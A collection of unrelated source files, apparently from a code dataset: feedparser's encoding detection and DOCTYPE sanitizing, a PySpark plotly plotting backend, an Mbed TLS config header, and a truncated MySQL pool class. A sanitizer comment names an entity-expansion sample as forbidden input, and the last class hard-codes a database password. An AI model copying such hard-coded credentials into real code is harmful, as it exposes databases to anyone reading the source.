    # http://www.w3.org/TR/REC-xml/#sec-guessing-no-ext-info

    # If the sniffed encoding is not ASCII-compatible, we need to make it
    # ASCII compatible so that we can sniff further into the XML declaration
    # to find the encoding attribute, which will tell us the true encoding.

    # Of course, none of this guarantees that we will be able to parse the
    # feed in the declared character encoding (assuming it was declared
    # correctly, which many are not). iconv_codec can help a lot;
    # you should definitely install it if you can.
    # http://cjkpython.i18n.org/

    bom_encoding = u''
    xml_encoding = u''
    rfc3023_encoding = u''

    # Look at the first few bytes of the document to guess what
    # its encoding may be. We only need to decode enough of the
    # document that we can use an ASCII-compatible regular
    # expression to search for an XML encoding declaration.
    # The heuristic follows the XML specification, section F:
    # http://www.w3.org/TR/REC-xml/#sec-guessing-no-ext-info
    # Check for BOMs first.
    if data[:4] == codecs.BOM_UTF32_BE:
        bom_encoding = u'utf-32be'
        data = data[4:]
    elif data[:4] == codecs.BOM_UTF32_LE:
        bom_encoding = u'utf-32le'
        data = data[4:]
    elif data[:2] == codecs.BOM_UTF16_BE and data[2:4] != ZERO_BYTES:
        bom_encoding = u'utf-16be'
        data = data[2:]
    elif data[:2] == codecs.BOM_UTF16_LE and data[2:4] != ZERO_BYTES:
        bom_encoding = u'utf-16le'
        data = data[2:]
    elif data[:3] == codecs.BOM_UTF8:
        bom_encoding = u'utf-8'
        data = data[3:]
    # Check for the characters '<?xm' in several encodings.
    elif data[:4] == EBCDIC_MARKER:
        bom_encoding = u'cp037'
    elif data[:4] == UTF16BE_MARKER:
        bom_encoding = u'utf-16be'
    elif data[:4] == UTF16LE_MARKER:
        bom_encoding = u'utf-16le'
    elif data[:4] == UTF32BE_MARKER:
        bom_encoding = u'utf-32be'
    elif data[:4] == UTF32LE_MARKER:
        bom_encoding = u'utf-32le'

    # Decode just enough (via UTF-8 round-trip) to search for the
    # encoding attribute of the XML declaration.
    tempdata = data
    try:
        if bom_encoding:
            tempdata = data.decode(bom_encoding).encode('utf-8')
    except (UnicodeDecodeError, LookupError):
        # feedparser recognizes UTF-32 encodings that aren't
        # available in Python 2.4 and 2.5, so it's possible to
        # encounter a LookupError during decoding.
        xml_encoding_match = None
    else:
        xml_encoding_match = RE_XML_PI_ENCODING.match(tempdata)

    if xml_encoding_match:
        xml_encoding = xml_encoding_match.groups()[0].decode('utf-8').lower()
        # Normalize the xml_encoding if necessary.
        if bom_encoding and (xml_encoding in (
            u'u16', u'utf-16', u'utf16', u'utf_16',
            u'u32', u'utf-32', u'utf32', u'utf_32',
            u'iso-10646-ucs-2', u'iso-10646-ucs-4',
            u'csucs4', u'csunicode', u'ucs-2', u'ucs-4'
        )):
            xml_encoding = bom_encoding

    # Find the HTTP Content-Type and, hopefully, a character
    # encoding provided by the server. The Content-Type is used
    # to choose the "correct" encoding among the BOM encoding,
    # XML declaration encoding, and HTTP encoding, following the
    # heuristic defined in RFC 3023.
    http_content_type = http_headers.get('content-type') or ''
    http_content_type, params = cgi.parse_header(http_content_type)
    http_encoding = params.get('charset', '').replace("'", "")
    if not isinstance(http_encoding, unicode):
        http_encoding = http_encoding.decode('utf-8', 'ignore')

    acceptable_content_type = 0
    application_content_types = (u'application/xml', u'application/xml-dtd',
                                 u'application/xml-external-parsed-entity')
    text_content_types = (u'text/xml', u'text/xml-external-parsed-entity')
    if (http_content_type in application_content_types) or \
       (http_content_type.startswith(u'application/') and
        http_content_type.endswith(u'+xml')):
        acceptable_content_type = 1
        rfc3023_encoding = http_encoding or xml_encoding or u'utf-8'
    elif (http_content_type in text_content_types) or \
         (http_content_type.startswith(u'text/') and
          http_content_type.endswith(u'+xml')):
        acceptable_content_type = 1
        rfc3023_encoding = http_encoding or u'us-ascii'
    elif http_content_type.startswith(u'text/'):
        rfc3023_encoding = http_encoding or u'us-ascii'
    elif http_headers and 'content-type' not in http_headers:
        rfc3023_encoding = xml_encoding or u'iso-8859-1'
    else:
        rfc3023_encoding = xml_encoding or u'utf-8'
    # gb18030 is a superset of gb2312, so always replace gb2312
    # with gb18030 for greater compatibility.
    if rfc3023_encoding.lower() == u'gb2312':
        rfc3023_encoding = u'gb18030'
    if xml_encoding.lower() == u'gb2312':
        xml_encoding = u'gb18030'

    # there are four encodings to keep track of:
    # - http_encoding is the encoding declared in the Content-Type HTTP header
    # - xml_encoding is the encoding declared in the <?xml declaration
    # - bom_encoding is the encoding sniffed from the first 4 bytes of the XML data
    # - rfc3023_encoding is the actual encoding, as per RFC 3023 and a variety of other conflicting specifications
    error = None

    if http_headers and (not acceptable_content_type):
        if 'content-type' in http_headers:
            msg = '%s is not an XML media type' % http_headers['content-type']
        else:
            msg = 'no Content-type specified'
        error = NonXMLContentType(msg)

    # determine character encoding
    known_encoding = 0
    chardet_encoding = None
    tried_encodings = []
    if chardet:
        chardet_encoding = chardet.detect(data)['encoding']
        if not chardet_encoding:
            chardet_encoding = ''
        if not isinstance(chardet_encoding, unicode):
            chardet_encoding = unicode(chardet_encoding, 'ascii', 'ignore')
    # try: HTTP encoding, declared XML encoding, encoding sniffed from BOM
    for proposed_encoding in (rfc3023_encoding, xml_encoding, bom_encoding,
                              chardet_encoding, u'utf-8', u'windows-1252', u'iso-8859-2'):
        if not proposed_encoding:
            continue
        if proposed_encoding in tried_encodings:
            continue
        tried_encodings.append(proposed_encoding)
        try:
            data = data.decode(proposed_encoding)
        except (UnicodeDecodeError, LookupError):
            pass
        else:
            known_encoding = 1
            # Update the encoding in the opening XML processing instruction.
            new_declaration = '''<?xml version='1.0' encoding='utf-8'?>'''
            if RE_XML_DECLARATION.search(data):
                data = RE_XML_DECLARATION.sub(new_declaration, data)
            else:
                data = new_declaration + u'\n' + data
            data = data.encode('utf-8')
            break
    # if still no luck, give up
    if not known_encoding:
        error = CharacterEncodingUnknown(
            'document encoding unknown, I tried ' +
            '%s, %s, utf-8, windows-1252, and iso-8859-2 but nothing worked' %
            (rfc3023_encoding, xml_encoding))
        rfc3023_encoding = u''
    elif proposed_encoding != rfc3023_encoding:
        # Decoding succeeded, but not with the encoding the spec said
        # to use; report the discrepancy without failing the parse.
        error = CharacterEncodingOverride(
            'document declared as %s, but parsed as %s' %
            (rfc3023_encoding, proposed_encoding))
        rfc3023_encoding = proposed_encoding

    return data, rfc3023_encoding, error
# Match XML entity declarations.
# Example: <!ENTITY copyright "(C)">
RE_ENTITY_PATTERN = re.compile(_s2bytes(r'^\s*<!ENTITY([^>]*?)>'), re.MULTILINE)

# Match XML DOCTYPE declarations.
# Example: <!DOCTYPE feed [ ]>
RE_DOCTYPE_PATTERN = re.compile(_s2bytes(r'^\s*<!DOCTYPE([^>]*?)>'), re.MULTILINE)

# Match safe entity declarations.
# This will allow hexadecimal character references through,
# as well as text, but not arbitrary nested entities.
# Example: cubed "&#179;"
# Example: copyright "(C)"
# Forbidden: explode1 "&explode2;&explode2;"
# Used by replace_doctype to rebuild a sanitized internal DTD subset.
RE_SAFE_ENTITY_PATTERN = re.compile(_s2bytes('\s+(\w+)\s+"(&#\w+;|[^&"]*)"'))
def replace_doctype(data):
    '''Strips and replaces the DOCTYPE, returns (version, data, safe_entities).

    version may be u'rss091n' (Netscape DOCTYPE found) or None.
    data is the same XML document (bytes) with the DOCTYPE replaced by a
    sanitized one containing only "safe" entity declarations.
    safe_entities maps entity name -> replacement text for the loose parser.
    '''
    # Divide the document into two groups by finding the location
    # of the first element that doesn't begin with '<?' or '<!'.
    start = re.search(_s2bytes('<\w'), data)
    start = start and start.start() or -1
    head, data = data[:start+1], data[start+1:]
    # Save and then remove all of the ENTITY declarations.
    entity_results = RE_ENTITY_PATTERN.findall(head)
    head = RE_ENTITY_PATTERN.sub(_s2bytes(''), head)
    # Find the DOCTYPE declaration and check the feed type.
    doctype_results = RE_DOCTYPE_PATTERN.findall(head)
    doctype = doctype_results and doctype_results[0] or _s2bytes('')
    if _s2bytes('netscape') in doctype.lower():
        version = u'rss091n'
    else:
        version = None
    # Re-insert the safe ENTITY declarations if a DOCTYPE was found.
    replacement = _s2bytes('')
    if len(doctype_results) == 1 and entity_results:
        match_safe_entities = lambda e: RE_SAFE_ENTITY_PATTERN.match(e)
        safe_entities = filter(match_safe_entities, entity_results)
        # NOTE(review): this truthiness test relies on Python 2's filter()
        # returning a list; under Python 3 a filter object is always truthy.
        if safe_entities:
            replacement = _s2bytes('<!DOCTYPE feed [\n<!ENTITY') \
                + _s2bytes('>\n<!ENTITY ').join(safe_entities) \
                + _s2bytes('>\n]>')
    data = RE_DOCTYPE_PATTERN.sub(replacement, head) + data
    # Precompute the safe entities for the loose parser.
    safe_entities = dict((k.decode('utf-8'), v.decode('utf-8'))
                  for k, v in RE_SAFE_ENTITY_PATTERN.findall(replacement))
    return version, data, safe_entities
# GeoRSS geometry parsers. Each return a dict with 'type' and 'coordinates'
# items, or None in the case of a parsing error.
def _parse_poslist(value, geom_type, swap=True, dims=2):
    # Parse a GML posList into a geometry dict, keyed on the GML geometry
    # type. Only 'linestring' and 'polygon' are supported; anything else
    # yields None.
    if geom_type == 'linestring':
        return _parse_georss_line(value, swap, dims)
    if geom_type != 'polygon':
        return None
    ring = _parse_georss_line(value, swap, dims)
    return {'type': u'Polygon', 'coordinates': (ring['coordinates'],)}
def _gen_georss_coords(value, swap=True, dims=2):
    # A generator of (lon, lat) pairs from a string of encoded GeoRSS
    # coordinates. Converts to floats and swaps order.
    # Python 2 only: uses itertools.imap and the .next bound method.
    latlons = itertools.imap(float, value.strip().replace(',', ' ').split())
    nxt = latlons.next
    while True:
        # Reversing with [::-1] when swap is true turns (lat, lon) into
        # (lon, lat). The generator terminates when nxt() raises
        # StopIteration (pre-PEP 479 idiom; would be a RuntimeError on
        # Python 3.7+).
        t = [nxt(), nxt()][::swap and -1 or 1]
        if dims == 3:
            t.append(nxt())
        yield tuple(t)
def _parse_georss_point(value, swap=True, dims=2):
    # A GeoRSS point is a single latitude-longitude pair separated by
    # whitespace (comma separators are tolerated too). Returns None on
    # malformed input.
    try:
        first_coord = list(_gen_georss_coords(value, swap, dims))[0]
    except (IndexError, ValueError):
        return None
    return {u'type': u'Point', u'coordinates': first_coord}
def _parse_georss_line(value, swap=True, dims=2):
    # A GeoRSS line is a whitespace-separated list of latitude-longitude
    # pairs in WGS84. Returns None on malformed input.
    try:
        points = list(_gen_georss_coords(value, swap, dims))
    except (IndexError, ValueError):
        return None
    return {u'type': u'LineString', u'coordinates': points}
def _parse_georss_polygon(value, swap=True, dims=2):
    # A GeoRSS polygon is a whitespace-separated list of latitude-longitude
    # pairs; a valid ring needs at least four pairs (the last repeats the
    # first, so three distinct points minimum). Returns None otherwise.
    try:
        ring = list(_gen_georss_coords(value, swap, dims))
    except (IndexError, ValueError):
        return None
    if len(ring) >= 4:
        return {u'type': u'Polygon', u'coordinates': (ring,)}
    return None
def _parse_georss_box(value, swap=True, dims=2):
    # A GeoRSS box is two whitespace-separated latitude-longitude pairs:
    # the lower corner followed by the upper corner. Returns None on
    # malformed input.
    try:
        corners = tuple(_gen_georss_coords(value, swap, dims))
    except (IndexError, ValueError):
        return None
    return {u'type': u'Box', u'coordinates': corners}
# end geospatial parsers
def parse(url_file_stream_or_string, etag=None, modified=None, agent=None, referrer=None, handlers=None, request_headers=None, response_headers=None):
    '''Parse a feed from a URL, file, stream, or string.

    request_headers, if given, is a dict from http header name to value to add
    to the request; this overrides internally generated values.

    Returns a FeedParserDict with (at least) 'feed', 'entries' and 'bozo'
    keys. 'bozo' is set to 1 below whenever a problem was encountered, with
    the exception stored under 'bozo_exception'. (Python 2 module: uses the
    `except E, e` syntax and the `unicode` builtin.)
    '''
    if handlers is None:
        handlers = []
    if request_headers is None:
        request_headers = {}
    if response_headers is None:
        response_headers = {}
    result = FeedParserDict()
    result['feed'] = FeedParserDict()
    result['entries'] = []
    result['bozo'] = 0
    if not isinstance(handlers, list):
        handlers = [handlers]
    # Fetch the raw bytes; any failure is recorded but parsing continues far
    # enough to return a result dict rather than raising.
    try:
        f = _open_resource(url_file_stream_or_string, etag, modified, agent, referrer, handlers, request_headers)
        data = f.read()
    except Exception, e:
        result['bozo'] = 1
        result['bozo_exception'] = e
        data = None
        f = None
    if hasattr(f, 'headers'):
        result['headers'] = dict(f.headers)
    # overwrite existing headers using response_headers
    if 'headers' in result:
        result['headers'].update(response_headers)
    elif response_headers:
        result['headers'] = copy.deepcopy(response_headers)
    # lowercase all of the HTTP headers for comparisons per RFC 2616
    if 'headers' in result:
        http_headers = dict((k.lower(), v) for k, v in result['headers'].items())
    else:
        http_headers = {}
    # if feed is gzip-compressed, decompress it
    if f and data and http_headers:
        if gzip and 'gzip' in http_headers.get('content-encoding', ''):
            try:
                data = gzip.GzipFile(fileobj=_StringIO(data)).read()
            except (IOError, struct.error), e:
                # IOError can occur if the gzip header is bad.
                # struct.error can occur if the data is damaged.
                result['bozo'] = 1
                result['bozo_exception'] = e
                if isinstance(e, struct.error):
                    # A gzip header was found but the data is corrupt.
                    # Ideally, we should re-request the feed without the
                    # 'Accept-encoding: gzip' header, but we don't.
                    data = None
        elif zlib and 'deflate' in http_headers.get('content-encoding', ''):
            try:
                data = zlib.decompress(data)
            except zlib.error, e:
                try:
                    # The data may have no headers and no checksum.
                    data = zlib.decompress(data, -15)
                except zlib.error, e:
                    result['bozo'] = 1
                    result['bozo_exception'] = e
    # save HTTP headers
    if http_headers:
        if 'etag' in http_headers:
            etag = http_headers.get('etag', u'')
            if not isinstance(etag, unicode):
                etag = etag.decode('utf-8', 'ignore')
            if etag:
                result['etag'] = etag
        if 'last-modified' in http_headers:
            modified = http_headers.get('last-modified', u'')
            if modified:
                result['modified'] = modified
                result['modified_parsed'] = _parse_date(modified)
    if hasattr(f, 'url'):
        if not isinstance(f.url, unicode):
            result['href'] = f.url.decode('utf-8', 'ignore')
        else:
            result['href'] = f.url
        result['status'] = 200
    if hasattr(f, 'status'):
        result['status'] = f.status
    if hasattr(f, 'close'):
        f.close()
    if data is None:
        return result
    # Stop processing if the server sent HTTP 304 Not Modified.
    if getattr(f, 'code', 0) == 304:
        result['version'] = u''
        result['debug_message'] = 'The feed has not changed since you last checked, ' + \
            'so the server sent no data. This is a feature, not a bug!'
        return result
    data, result['encoding'], error = convert_to_utf8(http_headers, data)
    # The strict (SAX) parser is only attempted when the encoding was
    # successfully determined.
    use_strict_parser = result['encoding'] and True or False
    if error is not None:
        result['bozo'] = 1
        result['bozo_exception'] = error
    result['version'], data, entities = replace_doctype(data)
    # Ensure that baseuri is an absolute URI using an acceptable URI scheme.
    contentloc = http_headers.get('content-location', u'')
    href = result.get('href', u'')
    baseuri = _makeSafeAbsoluteURI(href, contentloc) or _makeSafeAbsoluteURI(contentloc) or href
    baselang = http_headers.get('content-language', None)
    if not isinstance(baselang, unicode) and baselang is not None:
        baselang = baselang.decode('utf-8', 'ignore')
    if not _XML_AVAILABLE:
        use_strict_parser = 0
    if use_strict_parser:
        # initialize the SAX parser
        feedparser = _StrictFeedParser(baseuri, baselang, 'utf-8')
        saxparser = xml.sax.make_parser(PREFERRED_XML_PARSERS)
        saxparser.setFeature(xml.sax.handler.feature_namespaces, 1)
        try:
            # disable downloading external doctype references, if possible
            saxparser.setFeature(xml.sax.handler.feature_external_ges, 0)
        except xml.sax.SAXNotSupportedException:
            pass
        saxparser.setContentHandler(feedparser)
        saxparser.setErrorHandler(feedparser)
        source = xml.sax.xmlreader.InputSource()
        source.setByteStream(_StringIO(data))
        try:
            saxparser.parse(source)
        except xml.sax.SAXException, e:
            # Strict parse failed; record the failure and fall back to the
            # forgiving SGML-based parser below.
            result['bozo'] = 1
            result['bozo_exception'] = feedparser.exc or e
            use_strict_parser = 0
    if not use_strict_parser and _SGML_AVAILABLE:
        feedparser = _LooseFeedParser(baseuri, baselang, 'utf-8', entities)
        feedparser.feed(data.decode('utf-8', 'replace'))
    result['feed'] = feedparser.feeddata
    result['entries'] = feedparser.entries
    result['version'] = result['version'] or feedparser.version
    result['namespaces'] = feedparser.namespacesInUse
    return result
# The list of EPSG codes for geographic (latitude/longitude) coordinate
# systems to support decoding of GeoRSS GML profiles.
# Data constant: membership tests tell GML handling whether an srsName's
# EPSG code denotes a lat/lon CRS (and hence whether axes need swapping) —
# presumably checked by the GML parsing code elsewhere; verify at call site.
_geogCS = [
3819, 3821, 3824, 3889, 3906, 4001, 4002, 4003, 4004, 4005, 4006, 4007, 4008,
4009, 4010, 4011, 4012, 4013, 4014, 4015, 4016, 4018, 4019, 4020, 4021, 4022,
4023, 4024, 4025, 4027, 4028, 4029, 4030, 4031, 4032, 4033, 4034, 4035, 4036,
4041, 4042, 4043, 4044, 4045, 4046, 4047, 4052, 4053, 4054, 4055, 4075, 4081,
4120, 4121, 4122, 4123, 4124, 4125, 4126, 4127, 4128, 4129, 4130, 4131, 4132,
4133, 4134, 4135, 4136, 4137, 4138, 4139, 4140, 4141, 4142, 4143, 4144, 4145,
4146, 4147, 4148, 4149, 4150, 4151, 4152, 4153, 4154, 4155, 4156, 4157, 4158,
4159, 4160, 4161, 4162, 4163, 4164, 4165, 4166, 4167, 4168, 4169, 4170, 4171,
4172, 4173, 4174, 4175, 4176, 4178, 4179, 4180, 4181, 4182, 4183, 4184, 4185,
4188, 4189, 4190, 4191, 4192, 4193, 4194, 4195, 4196, 4197, 4198, 4199, 4200,
4201, 4202, 4203, 4204, 4205, 4206, 4207, 4208, 4209, 4210, 4211, 4212, 4213,
4214, 4215, 4216, 4218, 4219, 4220, 4221, 4222, 4223, 4224, 4225, 4226, 4227,
4228, 4229, 4230, 4231, 4232, 4233, 4234, 4235, 4236, 4237, 4238, 4239, 4240,
4241, 4242, 4243, 4244, 4245, 4246, 4247, 4248, 4249, 4250, 4251, 4252, 4253,
4254, 4255, 4256, 4257, 4258, 4259, 4260, 4261, 4262, 4263, 4264, 4265, 4266,
4267, 4268, 4269, 4270, 4271, 4272, 4273, 4274, 4275, 4276, 4277, 4278, 4279,
4280, 4281, 4282, 4283, 4284, 4285, 4286, 4287, 4288, 4289, 4291, 4292, 4293,
4294, 4295, 4296, 4297, 4298, 4299, 4300, 4301, 4302, 4303, 4304, 4306, 4307,
4308, 4309, 4310, 4311, 4312, 4313, 4314, 4315, 4316, 4317, 4318, 4319, 4322,
4324, 4326, 4463, 4470, 4475, 4483, 4490, 4555, 4558, 4600, 4601, 4602, 4603,
4604, 4605, 4606, 4607, 4608, 4609, 4610, 4611, 4612, 4613, 4614, 4615, 4616,
4617, 4618, 4619, 4620, 4621, 4622, 4623, 4624, 4625, 4626, 4627, 4628, 4629,
4630, 4631, 4632, 4633, 4634, 4635, 4636, 4637, 4638, 4639, 4640, 4641, 4642,
4643, 4644, 4645, 4646, 4657, 4658, 4659, 4660, 4661, 4662, 4663, 4664, 4665,
4666, 4667, 4668, 4669, 4670, 4671, 4672, 4673, 4674, 4675, 4676, 4677, 4678,
4679, 4680, 4681, 4682, 4683, 4684, 4685, 4686, 4687, 4688, 4689, 4690, 4691,
4692, 4693, 4694, 4695, 4696, 4697, 4698, 4699, 4700, 4701, 4702, 4703, 4704,
4705, 4706, 4707, 4708, 4709, 4710, 4711, 4712, 4713, 4714, 4715, 4716, 4717,
4718, 4719, 4720, 4721, 4722, 4723, 4724, 4725, 4726, 4727, 4728, 4729, 4730,
4731, 4732, 4733, 4734, 4735, 4736, 4737, 4738, 4739, 4740, 4741, 4742, 4743,
4744, 4745, 4746, 4747, 4748, 4749, 4750, 4751, 4752, 4753, 4754, 4755, 4756,
4757, 4758, 4759, 4760, 4761, 4762, 4763, 4764, 4765, 4801, 4802, 4803, 4804,
4805, 4806, 4807, 4808, 4809, 4810, 4811, 4813, 4814, 4815, 4816, 4817, 4818,
4819, 4820, 4821, 4823, 4824, 4901, 4902, 4903, 4904, 4979 ]
|
unknown
|
codeparrot/codeparrot-clean
| ||
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import TYPE_CHECKING, Union
import pandas as pd
from pyspark.pandas.plot import (
HistogramPlotBase,
name_like_string,
PandasOnSparkPlotAccessor,
BoxPlotBase,
KdePlotBase,
)
if TYPE_CHECKING:
import pyspark.pandas as ps # noqa: F401 (SPARK-34943)
def plot_pandas_on_spark(data: Union["ps.DataFrame", "ps.Series"], kind: str, **kwargs):
    """Route a pandas-on-Spark plot request to the appropriate plotly backend.

    Kinds with pandas-on-Spark specific implementations (pie, hist, box,
    kde/density) are handled locally; everything else falls through to
    plotly's generic entry point after materializing the data.
    """
    import plotly

    # pandas-on-Spark specific plots, dispatched by kind.
    specialized = {
        "pie": plot_pie,
        "hist": plot_histogram,
        "box": plot_box,
        "kde": plot_kde,
        "density": plot_kde,
    }
    handler = specialized.get(kind)
    if handler is not None:
        return handler(data, **kwargs)
    # Other plots.
    return plotly.plot(PandasOnSparkPlotAccessor.pandas_plot_data_map[kind](data), kind, **kwargs)
def plot_pie(data: Union["ps.DataFrame", "ps.Series"], **kwargs):
    """Render a pie chart with plotly express for a pandas-on-Spark object."""
    from plotly import express

    # Materialize the (sampled/limited) data as pandas first.
    data = PandasOnSparkPlotAccessor.pandas_plot_data_map["pie"](data)
    if isinstance(data, pd.Series):
        frame = data.to_frame()
        return express.pie(frame, values=frame.columns[0], names=frame.index, **kwargs)
    if isinstance(data, pd.DataFrame):
        y_column = kwargs.pop("y", None)
        # When a y column was given, fall back to the index for slice names.
        fallback_names = data.index if y_column is not None else None
        return express.pie(
            data,
            values=kwargs.pop("values", y_column),
            names=kwargs.pop("names", fallback_names),
            **kwargs,
        )
    raise RuntimeError("Unexpected type: [%s]" % type(data))
def plot_histogram(data: Union["ps.DataFrame", "ps.Series"], **kwargs):
    """Render a stacked-bar histogram for a pandas-on-Spark object.

    Bucket edges and per-column counts are computed distributedly via
    HistogramPlotBase; one go.Bar per column is stacked into a figure, with
    bars positioned at bucket midpoints to match matplotlib's output.
    """
    import plotly.graph_objs as go
    import pyspark.pandas as ps

    bins = kwargs.get("bins", 10)
    y = kwargs.get("y")
    if y and isinstance(data, ps.DataFrame):
        # Note that the results here are matched with matplotlib. x and y
        # handling is different from pandas' plotly output.
        data = data[y]
    psdf, bins = HistogramPlotBase.prepare_hist_data(data, bins)
    assert len(bins) > 2, "the number of buckets must be higher than 2."
    output_series = HistogramPlotBase.compute_hist(psdf, bins)
    prev = float("%.9f" % bins[0])  # to make it prettier, truncate.
    # Build "[lo, hi)" hover labels, one per bucket.
    text_bins = []
    for b in bins[1:]:
        norm_b = float("%.9f" % b)
        text_bins.append("[%s, %s)" % (prev, norm_b))
        prev = norm_b
    text_bins[-1] = text_bins[-1][:-1] + "]"  # replace ) to ] for the last bucket.
    # Bars are centered on the midpoint of each bucket.
    bins = 0.5 * (bins[:-1] + bins[1:])
    output_series = list(output_series)
    bars = []
    for series in output_series:
        bars.append(
            go.Bar(
                x=bins,
                y=series,
                name=name_like_string(series.name),
                text=text_bins,
                hovertemplate=(
                    "variable=" + name_like_string(series.name) + "<br>value=%{text}<br>count=%{y}"
                ),
            )
        )
    fig = go.Figure(data=bars, layout=go.Layout(barmode="stack"))
    fig["layout"]["xaxis"]["title"] = "value"
    fig["layout"]["yaxis"]["title"] = "count"
    return fig
def plot_box(data: Union["ps.DataFrame", "ps.Series"], **kwargs):
    """Render a box plot for a pandas-on-Spark Series.

    Quartiles/mean, whiskers and outliers are computed distributedly via
    BoxPlotBase and fed to a single pre-computed go.Box trace. Raises for
    DataFrame input, for 'boxpoints' other than 'suspectedoutliers'/False,
    and for notched boxes, none of which this backend supports.
    """
    import plotly.graph_objs as go
    import pyspark.pandas as ps

    if isinstance(data, ps.DataFrame):
        raise RuntimeError(
            "plotly does not support a box plot with pandas-on-Spark DataFrame. Use Series instead."
        )
    # 'whis' isn't actually an argument in plotly (but in matplotlib). But seems like
    # plotly doesn't expose the reach of the whiskers to the beyond the first and
    # third quartiles (?). Looks they use default 1.5.
    whis = kwargs.pop("whis", 1.5)
    # 'precision' is pandas-on-Spark specific to control precision for approx_percentile
    precision = kwargs.pop("precision", 0.01)
    # Plotly options
    boxpoints = kwargs.pop("boxpoints", "suspectedoutliers")
    notched = kwargs.pop("notched", False)
    if boxpoints not in ["suspectedoutliers", False]:
        raise ValueError(
            "plotly plotting backend does not support 'boxpoints' set to '%s'. "
            "Set to 'suspectedoutliers' or False." % boxpoints
        )
    if notched:
        raise ValueError(
            "plotly plotting backend does not support 'notched' set to '%s'. "
            "Set to False." % notched
        )
    colname = name_like_string(data.name)
    spark_column_name = data._internal.spark_column_name_for(data._column_label)
    # Computes mean, median, Q1 and Q3 with approx_percentile and precision
    col_stats, col_fences = BoxPlotBase.compute_stats(data, spark_column_name, whis, precision)
    # Creates a column to flag rows as outliers or not
    outliers = BoxPlotBase.outliers(data, spark_column_name, *col_fences)
    # Computes min and max values of non-outliers - the whiskers
    whiskers = BoxPlotBase.calc_whiskers(spark_column_name, outliers)
    fliers = None
    if boxpoints:
        fliers = BoxPlotBase.get_fliers(spark_column_name, outliers, whiskers[0])
        # plotly expects a list of y-arrays; drop the entry entirely when empty.
        fliers = [fliers] if len(fliers) > 0 else None
    fig = go.Figure()
    fig.add_trace(
        go.Box(
            name=colname,
            q1=[col_stats["q1"]],
            median=[col_stats["med"]],
            q3=[col_stats["q3"]],
            mean=[col_stats["mean"]],
            lowerfence=[whiskers[0]],
            upperfence=[whiskers[1]],
            y=fliers,
            boxpoints=boxpoints,
            notched=notched,
            **kwargs,  # this is for workarounds. Box takes different options from express.box.
        )
    )
    fig["layout"]["xaxis"]["title"] = colname
    fig["layout"]["yaxis"]["title"] = "value"
    return fig
def plot_kde(data: Union["ps.DataFrame", "ps.Series"], **kwargs):
    """Render kernel density estimate curves via plotly express line plots.

    Densities are computed distributedly per column with KdePlotBase over a
    shared evaluation grid ('ind'), concatenated into one pandas frame, and
    drawn as one line per column (colored by column name for DataFrames).
    """
    from plotly import express
    import pyspark.pandas as ps

    if isinstance(data, ps.DataFrame) and "color" not in kwargs:
        # One colored line per column unless the caller chose a color key.
        kwargs["color"] = "names"
    psdf = KdePlotBase.prepare_kde_data(data)
    sdf = psdf._internal.spark_frame
    data_columns = psdf._internal.data_spark_columns
    # Evaluation grid shared by every column's density curve.
    ind = KdePlotBase.get_ind(sdf.select(*data_columns), kwargs.pop("ind", None))
    bw_method = kwargs.pop("bw_method", None)
    pdfs = []
    for label in psdf._internal.column_labels:
        pdfs.append(
            pd.DataFrame(
                {
                    "Density": KdePlotBase.compute_kde(
                        sdf.select(psdf._internal.spark_column_for(label)),
                        ind=ind,
                        bw_method=bw_method,
                    ),
                    "names": name_like_string(label),
                    "index": ind,
                }
            )
        )
    pdf = pd.concat(pdfs)
    fig = express.line(pdf, x="index", y="Density", **kwargs)
    fig["layout"]["xaxis"]["title"] = None
    return fig
|
unknown
|
codeparrot/codeparrot-clean
| ||
/**
* \file mbedtls/config_psa.h
* \brief PSA crypto configuration options (set of defines)
*
* This set of compile-time options takes settings defined in
* include/mbedtls/mbedtls_config.h and include/psa/crypto_config.h and uses
* those definitions to define symbols used in the library code.
*
* Users and integrators should not edit this file, please edit
* include/mbedtls/mbedtls_config.h for MBEDTLS_XXX settings or
* include/psa/crypto_config.h for PSA_WANT_XXX settings.
*/
/*
* Copyright The Mbed TLS Contributors
* SPDX-License-Identifier: Apache-2.0 OR GPL-2.0-or-later
*/
#ifndef MBEDTLS_CONFIG_PSA_H
#define MBEDTLS_CONFIG_PSA_H
#include "psa/crypto_legacy.h"
#include "psa/crypto_adjust_config_synonyms.h"
#include "psa/crypto_adjust_config_dependencies.h"
#include "mbedtls/config_adjust_psa_superset_legacy.h"
#if defined(MBEDTLS_PSA_CRYPTO_CONFIG)
/* Require built-in implementations based on PSA requirements */
/* We need this to have a complete list of requirements
* before we deduce what built-ins are required. */
#include "psa/crypto_adjust_config_key_pair_types.h"
#if defined(MBEDTLS_PSA_CRYPTO_C)
/* If we are implementing PSA crypto ourselves, then we want to enable the
* required built-ins. Otherwise, PSA features will be provided by the server. */
#include "mbedtls/config_adjust_legacy_from_psa.h"
#endif
#else /* MBEDTLS_PSA_CRYPTO_CONFIG */
/* Infer PSA requirements from Mbed TLS capabilities */
#include "mbedtls/config_adjust_psa_from_legacy.h"
/* Hopefully the file above will have enabled keypair symbols in a consistent
* way, but including this here fixes them if that wasn't the case. */
#include "psa/crypto_adjust_config_key_pair_types.h"
#endif /* MBEDTLS_PSA_CRYPTO_CONFIG */
#if defined(PSA_WANT_ALG_JPAKE)
#define PSA_WANT_ALG_SOME_PAKE 1
#endif
#include "psa/crypto_adjust_auto_enabled.h"
#endif /* MBEDTLS_CONFIG_PSA_H */
|
c
|
github
|
https://github.com/nodejs/node
|
deps/LIEF/third-party/mbedtls/include/mbedtls/config_psa.h
|
"""
Instantiate a db connection.
"""
import mysql.connector as mysql
from mysql.connector.pooling import MySQLConnectionPool
class Db(object):
    """
    Instantiate a db connection.

    Wraps a MySQL connection pool. Each read of the ``session`` property
    checks a fresh connection out of the pool; ``db_conn`` is deliberately
    inaccessible and raises on both read and write.
    """

    def __init__(self):
        # SECURITY: credentials are hard-coded in source control; they should
        # be loaded from the environment or a secrets store instead.
        dbconfig = {
            "database": "geoDev",
            "user": "geo",
            "password": "0p3nM0d3!",
            "host": "localhost",
            "pool_name": "geo_pool",
            "pool_size": 20,
            "pool_reset_session": True
        }
